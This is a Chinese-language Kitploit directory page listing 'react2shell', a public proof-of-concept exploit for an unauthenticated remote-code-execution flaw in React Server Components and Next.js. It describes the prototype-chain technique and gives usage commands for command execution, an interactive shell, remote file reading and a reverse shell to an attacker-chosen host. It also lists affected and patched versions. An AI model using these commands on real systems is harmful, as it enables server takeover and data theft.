Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react2shell — react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - React Server Components(Flight 协议)中的未认证 RCE - PoC 漏洞利用 | Kitploit
工具/GitHubGitHub/rvzsec/react2shell
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubrvzsec/react2shell

react2shell

react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - React Server Components(Flight 协议)中的未认证 RCE - PoC 漏洞利用

查看仓库
63个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
react2shell

React2Shell

CVE-2025-55182 (Next.js: CVE-2025-66478)
React 服务器组件(Flight 协议)中的未认证 RCE - PoC 漏洞利用

描述

React 服务器组件(Flight 协议)在反序列化攻击者控制的 multipart/form-data 时,未对原型链访问进行校验。仅需一个携带 Next-Action 头的未认证 POST 请求,即可通过精心构造的引用链($1:__proto__:then + $1:constructor:constructor)触达 Function 构造函数,从而在服务器上实现远程代码执行。

影响 react-server-dom-{webpack,turbopack,parcel} 19.0.0 - 19.2.0 及下游使用者,包括 Next.js App Router(14.3.0-canary.77+、15.x、16.x)。默认的 create-next-app 项目均存在漏洞。

用法

git clone https://github.com/rvzsec/react2shell
cd react2shell
pip3 install -r requirements.txt
python3 react2shell.py check    -t <target>
python3 react2shell.py exec     -t <target> -c '<command>'
python3 react2shell.py shell    -t <target>
python3 react2shell.py file     -t <target> -f <remote-path> -o <local-out>
python3 react2shell.py revshell -t <target> --lhost <ip> --lport <port>

已修复版本

React 19.0.1 / 19.1.2 / 19.2.1+ - Next.js 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7

致谢

原始披露:Lachlan Davidson(@lachlan2k)

下载工具